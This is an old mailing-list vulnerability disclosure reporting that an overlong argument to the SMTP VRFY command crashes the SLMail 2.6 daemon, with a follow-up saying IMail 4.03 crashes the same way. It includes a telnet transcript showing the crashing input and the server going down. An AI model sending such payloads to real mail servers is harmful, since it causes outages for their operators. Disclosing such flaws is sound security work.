>
> Hello,
>
> I have recently found a quite serious DoS attack for the SLMail
> 2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
> after a command makes the program crash. I have only tested this on
> 2.6, so I'm not sure if other versions are vulnerable.
>
> craphole:~$ telnet www.victim.com 25
> Trying 555.55.555.55...
> Connected to www.victim.com.
> Escape character is '^]'.
> 220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
> vrfy
> dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
> dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
> dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
> dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
> dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
> dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
> dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
> dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
> Connection closed by foreign host.
>
> craphole:~$ telnet www.victim.com 25
> Trying 555.55.555.55...
> telnet: Unable to connect to remote host: Connection refused
> craphole:~$
>
> It will stay unresponsive until manually restarted. I haven't
> mailed Seattle Labs about this, but I'm sure they'll figure it out.
>
> Later,
>
> Cisc0 @ Undernet
> steven@efni.com
Out of boredom, I tried another smtp daemon for Windows, IMail (I tried
4.03) by IPSwitch (www.ipswitch.com). Which crashed the same way. Pretty
strange, I've only tried two windowsNT smtp daemons, and both crashed
the same way...
Cisc0 @ Undernet
steven@efni.com